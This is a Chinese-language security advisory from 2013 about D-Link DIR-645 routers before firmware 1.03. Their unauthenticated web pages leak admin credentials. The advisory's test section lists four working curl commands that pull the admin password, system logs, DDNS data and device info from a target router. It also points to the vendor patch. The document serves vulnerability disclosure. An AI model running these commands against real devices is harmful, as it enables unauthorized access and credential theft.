lulinux 2013-03-05
发布日期:2013-02-28
更新日期:2013-03-05
受影响系统:
D-Link DIR-645 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58231
D-Link DIR-645是无线路由器。
运行固件1.03之前版本的D-Link DIR-645,其Web界面上存在无需身份验证的网页,可被未经身份验证的远程攻击者利用泄露管理凭证,包括明文密码等敏感信息。
<*来源:Roberto Paleari ([email protected])
链接:http://secunia.com/advisories/52432/
http://archives.neohapsis.com/archives/bugtraq/2013-02/0151.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roberto Paleari ([email protected])提供了如下测试方法:
获取管理员密码:
curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php
读取系统日志:
curl http://<device ip>/log_get.php
获取DDNS信息:
curl -d act=getreport http://<device ip>/ddns_act.php
转储设备信息:
curl http://<device ip>/DevInfo.php
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dlink.com/